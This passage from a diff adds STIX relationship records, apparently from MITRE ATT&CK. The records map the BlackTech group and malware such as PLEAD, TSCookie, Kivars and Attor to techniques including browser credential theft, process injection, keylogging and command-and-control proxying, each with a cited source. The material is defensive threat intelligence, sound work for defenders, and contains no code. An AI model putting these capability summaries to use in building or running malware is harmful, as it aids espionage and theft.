+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "ESET PLEAD Malware July 2018",
+ "url": "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
+ "description": "Cherepanov, A.. (2018, July 9). Certificates stolen from Taiwanese tech\u2011companies misused in Plead malware campaign. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to steal saved credentials from web browsers.(Citation: TrendMicro BlackTech June 2017)(Citation: ESET PLEAD Malware July 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--f1952dea-f9d6-421b-947e-502796e2c883",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.970Z",
+ "created": "2020-05-06T15:26:38.970Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious links in e-mails.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--a77818b1-bbe8-477f-a8b1-1704e525d5a9",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.977Z",
+ "created": "2020-05-06T15:26:38.977Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--c756d00a-9ca0-435e-b226-bff2c123b390",
+ "type": "relationship",
+ "modified": "2020-05-06T15:48:01.508Z",
+ "created": "2020-05-06T15:48:01.508Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--036f4704-ce28-49cf-bb57-e4ce5079981e",
+ "type": "relationship",
+ "modified": "2020-05-06T15:48:01.780Z",
+ "created": "2020-05-06T15:48:01.780Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--d15c7116-2d00-48cd-9003-1ab6fc4a0076",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.785Z",
+ "created": "2020-05-06T16:06:23.629Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "JPCert BlackTech Malware September 2019",
+ "url": "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "description": "Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to proxy communications with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7c119557-d417-4708-a024-5be9c4d4d86c",
+ "type": "relationship",
+ "modified": "2020-07-07T14:05:07.563Z",
+ "created": "2020-05-06T17:47:43.569Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "JPCert BlackTech Malware September 2019",
+ "url": "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "description": "Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes.(Citation: JPCert BlackTech Malware September 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2a7a5ee2-e949-4d25-895a-43ba0bc8cc33",
+ "type": "relationship",
+ "modified": "2020-07-07T14:05:07.560Z",
+ "created": "2020-05-06T17:47:43.597Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "external_references": [
+ {
+ "source_name": "JPCert BlackTech Malware September 2019",
+ "url": "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "description": "Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) can use ICMP to receive information on the destination server.(Citation: JPCert BlackTech Malware September 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--20c30f4a-ff6f-4861-a88a-77d437374994",
+ "type": "relationship",
+ "modified": "2020-07-07T14:05:07.581Z",
+ "created": "2020-05-06T17:47:43.602Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to upload and download files to and from the infected host.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--1e54c837-6d59-40dc-a114-3bcef0037327",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.610Z",
+ "created": "2020-05-06T17:47:43.610Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to identify the IP of the infected host.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ce801c17-399a-426a-a4ec-1b7361ba9d4d",
+ "type": "relationship",
+ "modified": "2020-07-04T01:49:03.708Z",
+ "created": "2020-05-06T17:47:43.677Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has encrypted network communications with RC4.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--bfe30cdf-a0c8-440d-b471-d9fef00c559b",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.683Z",
+ "created": "2020-05-06T17:47:43.683Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to list processes on the infected host.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--1cc625dd-3079-4aa5-99f5-db1897795500",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.687Z",
+ "created": "2020-05-06T17:47:43.687Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--426c8308-0856-4dad-85e6-87df276cfa69",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.697Z",
+ "created": "2020-05-06T17:47:43.697Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to decrypt, load, and execute a DLL and its resources.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--2b062058-3345-4993-9715-6ad6e98dc2ad",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.700Z",
+ "created": "2020-05-06T17:47:43.700Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to execute shell commands on the infected host.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--183b5c91-0424-4a26-830c-cdeb8959b72a",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.710Z",
+ "created": "2020-05-06T17:47:43.710Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "JPCert BlackTech Malware September 2019",
+ "url": "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "description": "Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020."
+ },
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--2978353c-a652-4d42-a5da-4b937b09c8cf",
+ "type": "relationship",
+ "modified": "2020-07-07T14:05:07.584Z",
+ "created": "2020-05-06T17:47:43.717Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to remotely trigger keyboard input and mouse clicks. (Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--a51ea812-182b-47d8-94c2-331e4d9973f5",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.232Z",
+ "created": "2020-05-06T18:10:59.232Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to conceal its activity through hiding active windows.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--7ded147e-f252-490a-b0d7-d8b3492c84eb",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.275Z",
+ "created": "2020-05-06T18:10:59.275Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to capture screenshots on the infected host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--8a039d93-db2d-4a98-81d4-357425574bab",
+ "type": "relationship",
+ "modified": "2020-06-03T20:19:35.061Z",
+ "created": "2020-05-06T18:10:59.296Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to initiate keylogging on the infected host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--7d086d88-59d1-444a-a766-ef52216625ff",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.301Z",
+ "created": "2020-05-06T18:10:59.301Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to uninstall malware from the infected host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--0aa51def-3a75-4c69-8b65-82559d8f4c83",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.308Z",
+ "created": "2020-05-06T18:10:59.308Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to list drives on the infected host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--37e4bb23-505b-41bb-a2f4-98501b065598",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.312Z",
+ "created": "2020-05-06T18:10:59.312Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to download and execute files.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--93dc6241-29b4-45c6-9593-f7862936ffd8",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.316Z",
+ "created": "2020-05-06T18:10:59.316Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--28ee4a1e-1e63-4c72-8424-4f923b074ad9",
+ "type": "relationship",
+ "modified": "2020-05-06T18:12:24.034Z",
+ "created": "2020-05-06T18:12:24.034Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a",
+ "target_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "external_references": [
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "(Citation: US-CERT HOTCROISSANT February 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--636c3816-21ed-46f7-8837-2334bed88e42",
+ "type": "relationship",
+ "modified": "2020-05-06T19:32:14.855Z",
+ "created": "2020-05-06T19:32:14.855Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c47d3636-65dd-4da1-8c90-e3e7aeb7effb",
+ "type": "relationship",
+ "modified": "2020-07-07T12:35:12.068Z",
+ "created": "2020-05-06T20:40:19.102Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has automatically collected data about the compromised system.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--982474f3-d61d-49ac-b5be-30553e872db1",
+ "type": "relationship",
+ "modified": "2020-07-07T12:35:12.033Z",
+ "created": "2020-05-06T20:40:19.118Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
